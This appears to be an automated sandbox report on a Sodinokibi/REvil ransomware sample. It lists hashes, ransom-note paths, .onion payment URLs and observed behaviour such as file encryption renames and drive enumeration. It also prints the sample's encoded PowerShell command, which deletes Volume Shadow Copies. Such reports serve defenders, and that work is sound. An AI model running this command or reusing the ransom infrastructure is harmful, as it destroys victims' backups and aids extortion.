Analysis
-
max time kernel
119s -
max time network
145s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24-01-2022 00:55
Static task
static1
Behavioral task
behavioral1
Sample
d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe
Resource
win10-en-20211208
General
-
Target
d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe
-
Size
114KB
-
MD5
7aa014e2800e080f3d14737599d21cf9
-
SHA1
62ae49505dad5b24f8fbc8b78fd73da18c55a068
-
SHA256
d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be
-
SHA512
b71067909b78c018d17ef39ca21247cbc901e2635bb2394164ae9d97e35bf25021f922f3c2fa0e951f50c601ba136982f048640c76ea57d861e7d7c4f96a61f3
Malware Config
Extracted
C:\95v25c3-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D2644A3314CA96A2
http://decryptor.cc/D2644A3314CA96A2
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exedescription ioc process File renamed C:\Users\Admin\Pictures\ConvertFromStop.raw => \??\c:\users\admin\pictures\ConvertFromStop.raw.95v25c3 d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File renamed C:\Users\Admin\Pictures\InitializeProtect.crw => \??\c:\users\admin\pictures\InitializeProtect.crw.95v25c3 d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File renamed C:\Users\Admin\Pictures\InstallDisconnect.raw => \??\c:\users\admin\pictures\InstallDisconnect.raw.95v25c3 d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File renamed C:\Users\Admin\Pictures\RequestDisable.tif => \??\c:\users\admin\pictures\RequestDisable.tif.95v25c3 d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File renamed C:\Users\Admin\Pictures\SearchGrant.tif => \??\c:\users\admin\pictures\SearchGrant.tif.95v25c3 d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File renamed C:\Users\Admin\Pictures\SendComplete.png => \??\c:\users\admin\pictures\SendComplete.png.95v25c3 d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exedescription ioc process File opened (read-only) \??\G: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\H: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\L: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\N: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\O: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\F: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\J: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\U: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\V: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\E: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\I: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\M: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\P: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\R: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\S: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\X: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\Y: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\D: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\A: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\B: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\K: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\Q: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\T: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\W: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened (read-only) \??\Z: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\fhm75.bmp" d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe -
Drops file in Program Files directory 19 IoCs
Processes:
d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exedescription ioc process File opened for modification \??\c:\program files\RedoUndo.asp d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened for modification \??\c:\program files\UnlockWrite.TTS d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\95v25c3-readme.txt d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened for modification \??\c:\program files\ConvertToSuspend.css d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened for modification \??\c:\program files\MountUpdate.kix d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened for modification \??\c:\program files\RequestRestart.001 d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened for modification \??\c:\program files\TraceDisconnect.aiff d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\95v25c3-readme.txt d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened for modification \??\c:\program files\InvokeConnect.vst d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened for modification \??\c:\program files\OpenExport.3gpp d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened for modification \??\c:\program files\PublishTrace.fon d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\95v25c3-readme.txt d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File created \??\c:\program files (x86)\95v25c3-readme.txt d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened for modification \??\c:\program files\ClearSwitch.sql d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened for modification \??\c:\program files\DebugDeny.ttc d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened for modification \??\c:\program files\ResolveUnlock.dwg d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened for modification \??\c:\program files\SendJoin.odt d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File opened for modification \??\c:\program files\TraceEdit.mpeg2 d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe File created \??\c:\program files\95v25c3-readme.txt d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exepowershell.exepid process 1796 d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe 672 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1796 d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe Token: SeDebugPrivilege 672 powershell.exe Token: SeBackupPrivilege 1300 vssvc.exe Token: SeRestorePrivilege 1300 vssvc.exe Token: SeAuditPrivilege 1300 vssvc.exe Token: SeTakeOwnershipPrivilege 1796 d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exedescription pid process target process PID 1796 wrote to memory of 672 1796 d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe powershell.exe PID 1796 wrote to memory of 672 1796 d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe powershell.exe PID 1796 wrote to memory of 672 1796 d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe powershell.exe PID 1796 wrote to memory of 672 1796 d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe"C:\Users\Admin\AppData\Local\Temp\d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:672
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:588
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1300
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/672-55-0x000007FEFC321000-0x000007FEFC323000-memory.dmpFilesize
8KB
-
memory/672-56-0x000007FEF35B0000-0x000007FEF410D000-memory.dmpFilesize
11.4MB
-
memory/672-57-0x0000000002460000-0x0000000002462000-memory.dmpFilesize
8KB
-
memory/672-58-0x0000000002462000-0x0000000002464000-memory.dmpFilesize
8KB
-
memory/672-59-0x0000000002464000-0x0000000002467000-memory.dmpFilesize
12KB
-
memory/672-60-0x000000001B740000-0x000000001BA3F000-memory.dmpFilesize
3.0MB
-
memory/672-61-0x000000000246B000-0x000000000248A000-memory.dmpFilesize
124KB
-
memory/1796-54-0x0000000076C61000-0x0000000076C63000-memory.dmpFilesize
8KB